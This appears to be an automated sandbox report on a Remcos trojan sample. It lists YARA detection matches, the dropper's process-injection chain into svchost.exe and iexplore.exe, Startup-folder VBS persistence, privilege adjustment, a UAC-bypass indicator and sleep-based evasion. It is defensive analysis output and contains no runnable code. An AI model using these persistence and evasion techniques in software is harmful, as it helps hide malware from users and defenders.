                  Source: 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: Process Memory Space: ambiparous.exe PID: 7880, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: svchost.exe PID: 7900, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: ambiparous.exe PID: 8128, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: svchost.exe PID: 8168, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@12/7@0/1
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003AA06A GetLastError,FormatMessageW,0_2_003AA06A
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003981CB AdjustTokenPrivileges,CloseHandle,0_2_003981CB
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003987E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003987E1
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B481CB AdjustTokenPrivileges,CloseHandle,2_2_00B481CB
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B487E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00B487E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,3_2_0041798D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_0041798D
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003AB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_003AB333
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003BEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_003BEE0D
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003B83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_003B83BB
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_00344E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00344E89
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_0041AADB
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeFile created: C:\Users\user\AppData\Local\lecheriesJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-ZFXG9Y
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeFile created: C:\Users\user\AppData\Local\Temp\autC2A3.tmpJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ambiparous.vbs"
                  Source: OKkUGRkZV7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: OKkUGRkZV7.exeVirustotal: Detection: 61%
                  Source: OKkUGRkZV7.exeReversingLabs: Detection: 65%
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeFile read: C:\Users\user\Desktop\OKkUGRkZV7.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\OKkUGRkZV7.exe "C:\Users\user\Desktop\OKkUGRkZV7.exe"
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeProcess created: C:\Users\user\AppData\Local\lecheries\ambiparous.exe "C:\Users\user\Desktop\OKkUGRkZV7.exe"
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OKkUGRkZV7.exe"
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "c:\program files (x86)\internet explorer\iexplore.exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ambiparous.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\lecheries\ambiparous.exe "C:\Users\user\AppData\Local\lecheries\ambiparous.exe"
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\lecheries\ambiparous.exe"
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeProcess created: C:\Users\user\AppData\Local\lecheries\ambiparous.exe "C:\Users\user\Desktop\OKkUGRkZV7.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OKkUGRkZV7.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "c:\program files (x86)\internet explorer\iexplore.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\lecheries\ambiparous.exe "C:\Users\user\AppData\Local\lecheries\ambiparous.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\lecheries\ambiparous.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: OKkUGRkZV7.exeStatic file information: File size 1323520 > 1048576
                  Source: OKkUGRkZV7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: OKkUGRkZV7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: OKkUGRkZV7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: OKkUGRkZV7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: OKkUGRkZV7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: OKkUGRkZV7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: OKkUGRkZV7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: ambiparous.exe, 00000002.00000003.1388403621.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, ambiparous.exe, 00000002.00000003.1390662543.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, ambiparous.exe, 00000007.00000003.1533944638.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, ambiparous.exe, 00000007.00000003.1535030253.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: ambiparous.exe, 00000002.00000003.1388403621.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, ambiparous.exe, 00000002.00000003.1390662543.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, ambiparous.exe, 00000007.00000003.1533944638.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, ambiparous.exe, 00000007.00000003.1535030253.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: svchost.pdb source: svchost.exe, 00000003.00000003.1392980933.0000000000821000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1397706009.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, iexplore.exe, iexplore.exe, 00000004.00000002.1393803718.0000000002FD0000.00000040.80000000.00040000.00000000.sdmp
                  Source: Binary string: svchost.pdbUGP source: svchost.exe, 00000003.00000003.1392980933.0000000000821000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1397706009.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, iexplore.exe, 00000004.00000002.1393803718.0000000002FD0000.00000040.80000000.00040000.00000000.sdmp
                  Source: OKkUGRkZV7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: OKkUGRkZV7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: OKkUGRkZV7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: OKkUGRkZV7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: OKkUGRkZV7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_00344B37 LoadLibraryA,GetProcAddress,0_2_00344B37
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_0034C4C6 push A30034BAh; retn 0034h0_2_0034C50D
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_00368945 push ecx; ret 0_2_00368958
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B18945 push ecx; ret 2_2_00B18958
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00457186 push ecx; ret 3_2_00457199
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0045E55D push esi; ret 3_2_0045E566
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00457AA8 push eax; ret 3_2_00457AC6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00434EB6 push ecx; ret 3_2_00434EC9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00457186 push ecx; ret 8_2_00457199
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0045E55D push esi; ret 8_2_0045E566
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00457AA8 push eax; ret 8_2_00457AC6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00434EB6 push ecx; ret 8_2_00434EC9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00406EEB ShellExecuteW,URLDownloadToFileW,3_2_00406EEB
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeFile created: C:\Users\user\AppData\Local\lecheries\ambiparous.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ambiparous.vbsJump to dropped file
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ambiparous.vbsJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ambiparous.vbsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_0041AADB
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003448D7
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003C5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_003C5376
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00AF48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00AF48D7
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B75376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00B75376
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_00363187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00363187
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040F7E2 Sleep,ExitProcess,3_2_0040F7E2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040F7E2 Sleep,ExitProcess,8_2_0040F7E2
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeAPI/Special instruction interceptor: Address: 118854C
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeAPI/Special instruction interceptor: Address: 12B9E94
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,3_2_0041A7D9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_0041A7D9
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 3078Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 6426Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: foregroundWindowGot 1752Jump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeAPI coverage: 4.5 %
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeAPI coverage: 4.8 %
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 2636Thread sleep count: 194 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 2636Thread sleep time: -97000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7172Thread sleep count: 3078 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7172Thread sleep time: -9234000s >= -30000sJump to behavior
